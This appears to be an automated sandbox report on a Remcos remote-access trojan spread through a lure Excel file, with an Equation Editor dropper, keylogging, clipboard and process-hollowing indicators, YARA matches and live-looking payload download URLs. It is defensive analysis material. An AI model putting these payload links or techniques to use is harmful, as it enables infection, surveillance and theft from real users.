                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp, csrss.exe, 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp, Efftwcmk.PIFString found in binary or memory: http://geoplugin.net/json.gp
                  Source: csrss.exe, 00000008.00000002.1012207860.0000000033DAB000.00000040.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000C.00000002.484496833.00000000272CB000.00000040.00000800.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpt
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                  Source: qr-in.com.url.4.drString found in binary or memory: http://qr-in.com/
                  Source: Home Purchase Contract and Property Details.xls, NAvSGzZ.url.4.drString found in binary or memory: http://qr-in.com/NAvSGzZ
                  Source: ~DF5534031E748409A6.TMP.0.dr, 0B430000.0.drString found in binary or memory: http://qr-in.com/NAvSGzZyX
                  Source: Home Purchase Contract and Property Details.xls, ~DF5534031E748409A6.TMP.0.dr, 31682C44.png.0.dr, ~DF78F515A159E2AA69.TMP.0.dr, 0B430000.0.dr, DF465E1C.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: Efftwcmk.PIF, Efftwcmk.PIF, 0000000B.00000002.464066991.0000000001E92000.00000004.00001000.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474420464.000000007EDB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                  Source: csrss.exe, 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://f3rtrw.bl.files.1drv.com/y4mAd3mcZPGImnMlQzVaLUaRGLF5rJ6dTRnmjMGEyxD33cnd2H9ImAFk6GH06rI3KMc
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp, csrss.exe, 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://f3rtrw.bl.files.1drv.com/y4mx_vDnHSZNTOhTMVLVmQRlGEek-eb6UO4R5ONQLcqQVc4RctseT_K1ezCYuH-Cc-_
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://live.com/
                  Source: csrss.exe, 00000008.00000002.1011774881.000000003287D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/downlo
                  Source: csrss.exe, 00000008.00000002.1011774881.0000000032868000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=
                  Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4A2B8 SetWindowsHookExA 0000000D,33D4A2A4,000000008_2_33D4A2B8
                  Source: C:\Users\user\AppData\Roaming\csrss.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\csrss.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4B70E OpenClipboard,GetClipboardData,CloseClipboard,8_2_33D4B70E
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4B70E OpenClipboard,GetClipboardData,CloseClipboard,8_2_33D4B70E
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D4A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,8_2_33D4A3E0
                  Source: Yara matchFile source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.463489236.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.479146346.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: csrss.exe PID: 3832, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Efftwcmk.PIF PID: 920, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\notes\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D5C9E2 SystemParametersInfoW,8_2_33D5C9E2

                  System Summary

                  barindex
                  Source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000C.00000002.484496833.00000000272CB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000008.00000002.1012207860.0000000033DAB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: csrss.exe PID: 3832, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: Efftwcmk.PIF PID: 920, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\398EA60A.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: Screenshot number: 4Screenshot OCR: Enable Editing from the 16 9 . . . - Baj jaros Mah. AtatUK yellow bar above " 10 '" " OeE zciler M
                  Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above 20 12 ' " Yoj :1ren KOyU, 1>nakkc 21 13 " Aky Cad. No:
                  Source: Screenshot number: 16Screenshot OCR: Enable Content from the yellow bar above t 19 12 ' " VOID -en KOyU, 1>nakk 20 13 " AkW Cad.
                  Source: Home Purchase Contract and Property Details.xlsOLE: Microsoft Excel 2007+
                  Source: ~DF78F515A159E2AA69.TMP.0.drOLE: Microsoft Excel 2007+
                  Source: 0B430000.0.drOLE: Microsoft Excel 2007+
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\NAvSGzZ.urlJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\qr-in.com.urlJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\csrss.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess Stats: CPU usage > 49%
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\extrac32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D5BB09 OpenProcess,NtSuspendProcess,CloseHandle,8_2_33D5BB09
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D5BB35 OpenProcess,NtResumeProcess,CloseHandle,8_2_33D5BB35
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D532D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,8_2_33D532D2
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D5D58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,8_2_33D5D58F
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C8D6D4 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,11_2_02C8D6D4
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C8D654 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,11_2_02C8D654
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C8C7B8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,11_2_02C8C7B8
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C87A74 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,11_2_02C87A74
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C87924 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,11_2_02C87924
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C8816E CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,11_2_02C8816E
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C88170 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,11_2_02C88170
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C8C6D2 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,11_2_02C8C6D2
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C8C6D4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,11_2_02C8C6D4
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C87A72 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,11_2_02C87A72
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C87922 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,11_2_02C87922
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C87CA8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,11_2_02C87CA8
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C8816E CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,11_2_02C8816E
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D567B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,8_2_33D567B9
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D9332B8_2_33D9332B
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D7E2FB8_2_33D7E2FB
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D861F08_2_33D861F0
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D739468_2_33D73946
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D7E0CC8_2_33D7E0CC
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D76FEA8_2_33D76FEA
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D7DE9D8_2_33D7DE9D
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D75E5E8_2_33D75E5E
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D7E5588_2_33D7E558
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D5DB628_2_33D5DB62
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D571218_2_33D57121
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 8_2_33D570C28_2_33D570C2
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_02C720C411_2_02C720C4
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D256FEA11_2_2D256FEA
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D246E0E11_2_2D246E0E
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D25DE9D11_2_2D25DE9D
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D25394611_2_2D253946
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D23DB6211_2_2D23DB62
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D247BAF11_2_2D247BAF
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D247A4611_2_2D247A46
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D25877011_2_2D258770
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D27415911_2_2D274159
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D2661F011_2_2D2661F0
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D23F0FA11_2_2D23F0FA
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D27332B11_2_2D27332B
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: 11_2_2D24739D11_2_2D24739D
                  Source: Home Purchase Contract and Property Details.xlsOLE indicator, VBA macros: true
                  Source: Home Purchase Contract and Property Details.xlsStream path 'MBD00099101/\x1Ole' : http://qr-in.com/NAvSGzZ{Oj3)RXku>SI%5.xBI0Qkoh?oBdGa]dn{CwQ/lzIawQOWjk ~FG4|eK<:~c D!W6%L(3Y+UpmT|Z+MzH'YvCT|,kDfXwy:p0PzMhW6YXp3ixiWoRXXPqmQjkuFlUB0rZEYLONZNpkrrEQry1s7viSBC9qAGZcbSd6YSWt6skNTah80TV1OAnBjyYAV5iCjaD0Vvvu78SpMjdPoeeEGsxT51PsjFbZH0egg0ScOog0wHB76WhvSs1Bksop3d6wNw6oA90d3HmdHEafGfKALEuiPiEoXTjmOQ18lxNyMZVUKzBmla07E7Sj1KmS19X806a92Ab94RDIkrHfQ3Sh5shdI3u%me<fFiX+
                  Source: ~DF78F515A159E2AA69.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: ~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: String function: 33D74E10 appears 43 times
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: String function: 02C87DF4 appears 45 times
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: String function: 02C746A4 appears 244 times
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: String function: 02C76640 appears 37 times
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: String function: 02C7480C appears 771 times
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: String function: 02C87CA8 appears 49 times
                  Source: C:\Users\Public\Libraries\Efftwcmk.PIFCode function: String function: 02C744AC appears 69 times
                  Source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000C.00000002.484496833.00000000272CB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000008.00000002.1012207860.0000000033DAB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
